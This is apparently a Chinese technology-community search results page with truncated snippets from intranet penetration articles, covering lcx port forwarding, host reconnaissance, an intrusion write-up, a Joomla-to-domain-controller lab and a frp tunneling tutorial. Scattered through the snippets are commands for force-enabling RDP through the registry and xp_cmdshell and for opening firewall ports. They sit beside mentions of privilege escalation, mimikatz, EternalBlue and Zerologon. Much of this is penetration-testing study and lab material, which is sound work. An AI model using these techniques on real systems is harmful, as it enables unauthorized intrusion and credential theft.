首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
您找到你想要的搜索结果了吗?
是的
没有找到

Lcx的多种用法:3个功能+9个参数,你会怎么玩?

百度一下,原来对面的服务器是在内网中,没有做映射是连接不到的,但是可以借助一个工具进行端口转发来实现连接处于内网3389服务器,原文链接(百度搜索lcx第一条出现的):http://sec.chinabyte.com...关于 那篇文章大概意思是说连接内网3389需要4步: 1:确定被控制计算机的内网ip 2:被控制的计算机执行”lcx -slave 你的计算机ip 51 被控制计算机的ip 3389”...其实不然,有些特殊情况是可以反过来用的:对面监听我们执行slave,在对面我们看来是反向连接了,但是在我们看来我们是去正向连接的(就像你直接访问对面的3389),防火墙也不会拦截,这样这可以连接成功,...假设2: 1、 你拿下了两台内网服务器A和B 2、 服务器B不能访问任何机器(自己的话当然可以了),只能让别人访问 遇到这种情况比较好处理,只需参考上面一个假设就能上网了,Blisten ,A...再说一个实例: 有一次渗透中遇到了一个比较蛋疼的情况,有一台服务器我3389上去了但是上面有一个防火墙软件,有个特性:允许连接内网的请求,不能直接访问外网。 我的目的是抓密码。

2.9K60

浅析内网信息收集

文章前言 在渗透测试中信息收集的深度与广度以及对关键信息的提取,直接或间接的决定了渗透测试的质量,本篇文章主要对内网中信息收集做一个简单的归纳以及介绍 主机信息 在内网渗透测试中,当我们拿下一台或多台可控的主机...(大多数情况下都是边界主机)时,我们首先要对当前主机的信息进行简易收集,常见的信息包括以下几个方面: 网络配置 通过执行以下命令查看当前机器是否处于内网,以及内网网段是多少,以及DNS地址、域名信息等等...3389 首先,我们需要确定远程连接的端口(一般是3389),在cmd下使用注册表查询语句,命令如下,得到连接端口为0xd3d,转换后为3389,如下图所示: REG QUERY "HKEY_LOCAL_MACHINE...在 Windows Server 2003 中开启 3389 端口: 首先,查看开启的端口——没有开启3389端口 ?...成功开启3389端口: ? 在 Windows Server 2008 和 Windows Server 2012 中开启 3389 端口 查看当前开发端口———未开放3389端口 ?

93961

内网信息收集

文章前言 在渗透测试中信息收集的深度与广度以及对关键信息的提取,直接或间接的决定了渗透测试的质量,本篇文章主要对内网中信息收集做一个简单的归纳以及介绍 主机信息 在内网渗透测试中,当我们拿下一台或多台可控的主机...(大多数情况下都是边界主机)时,我们首先要对当前主机的信息进行简易收集,常见的信息包括以下几个方面: 网络配置 通过执行以下命令查看当前机器是否处于内网,以及内网网段是多少,以及DNS地址、域名信息等等...3389 首先,我们需要确定远程连接的端口(一般是3389),在cmd下使用注册表查询语句,命令如下,得到连接端口为0xd3d,转换后为3389,如下图所示: REG QUERY "HKEY_LOCAL_MACHINE...在 Windows Server 2003 中开启 3389 端口: 首先,查看开启的端口——没有开启3389端口 ?...成功开启3389端口: ? 在 Windows Server 2008 和 Windows Server 2012 中开启 3389 端口 查看当前开发端口———未开放3389端口 ?

1K40

记一次站库分离的内网渗透

直接getsystem是不行的,用suggester来试一下 这里选择用ms16_075来提权 SQL Server Privilege Escalation 看到还有一个网卡,是有内网的,加个用户...3389上去看一下 看到确实有三个网站在运行,有一个是.net的,但是本机没有sql server,考虑是不是站库分离的情况。...直接aspx马连一家伙 添加一下xp_cmdshell执行命令 136应该是sql sever ip,先xp_cmdshell强开一波3389 reg add "HKEY_LOCAL_MACHINE...这里注意,如果ew比较麻烦,不太好上传,那我们可以在msf添加了路由之后,使用auxiliary/server/socks4a这个模块,用msf开个socks代理,这样本机可以通过msf的路由来访问内网...Intranet Web Information Gathering 看到一台129,我也不做探测了,看起来就那么一两台,如果要探测内网的话可以proxychains配合nmap或者msf添加路由后本身就可以完成

73510

实战 | 记一次站库分离的内网渗透

看到还有一个网卡,是有内网的,加个用户3389上去看一下: ? ? 看到确实有三个网站在运行,有一个是.net的,但是本机没有sql server,考虑是不是站库分离的情况。 ?...136应该是sql sever ip,先xp_cmdshell强开一波3389: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control...SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389...这里注意,如果ew比较麻烦,不太好上传,那我们可以在msf添加了路由之后,使用auxiliary/server/socks4a这个模块,用msf开个socks代理,这样本机可以通过msf的路由来访问内网...看到一台129,我也不做探测了,看起来就那么一两台,如果要探测内网的话可以proxychains配合nmap或者msf添加路由后本身就可以完成。同样的,用ew做了层代理。

2.3K30

靶场学习-从joomla到拿下域控

/dirty 123 提权成功,使用 firefart 用户进行登录,密码为123 接着进行内网信息搜集,发现机器为双网卡 通过ping发现机器出网 上传 frp 搭建代理隧道 proxifier...,因此寻找其他的方法 接着通过 tasklsit /svc 进行杀软识别,机器上无杀软 由于内网不出网,这里在linux机器上开启http服务,把mimikatz扔上去 然后使用powershell...REG_DWORD /d 0 /f 修改完注册表的话需要重启,但重启之后上面登着的进程也没了,意义不大 这里初步判断192.168.93.10为域控,尝试使用CVE-2020-1472,由于代理不太稳定,靶机直接3389.../t REG_DWORD /d 00000000 /f #执行以下命令操作注册表来关闭机器3389远程桌面服务 REG ADD HKLM\SYSTEM\CurrentControlSet\Control.../t REG_DWORD /d 11111111 /f #使用以下命令添加防火墙放行策略 netsh firewall add portopening protocol = TCP port = 3389

1.1K20

内网渗透 | 手把手教你如何进行内网渗透

get shell 到这里呢,想了想我们的目标是内网,并且防火墙没开,就不考虑提权了。 ---- 0x02 跳板及内网探测 现在的目标是将此DMZ服务器当作跳板并探测内网的服务器。...admin 123456 这个cms呢,后台可以getshell,我是被卡在burpsuite抓包上面,开了burpsuite总是无法访问,后来才发现,在burpsuite里面设置了socks代理就没必要再proxifier...第二种方法 如上配置后,就不需要再socks代理工具了,否则会出现问题。 ? 在后台添加php允许上传,再去上传点,不要传php因为判断了Content-Type。 ?...可以看到开了135、445、3389,啥都不说了,永恒之蓝打一波。 0x4 第三层内网渗透 ? ?...3389 至此呢,本次内网渗透就完成了。

9K22

简单使用 Frp

frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。...由于我们学校的校园网封死了许多远程连接的软件,而热点再使用向日葵等远程连接工具又不方便(主要是实验室信号不太好),正好又有一台云服务器,可以提供一个公网 IP,就简单研究了一下 Frp。...# 名字可以设一个自己好记的 type = tcp # 连接类型 local_ip = 127.0.0.1 # 本机地址 local_port = 3389...# 要穿透的端口 remote_port = 6666 # 服务器端口(修改) 如此设置后,frp 会将请求 x.x.x.x:9999 的流量转发到内网机器的 3389...3389 端口是 Windows Server 远程桌面的服务端口,可以通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器,如果连接上了,输入系统管理员的用户名和密码后,将变得可以像操作本机一样操作远程的电脑

46410
领券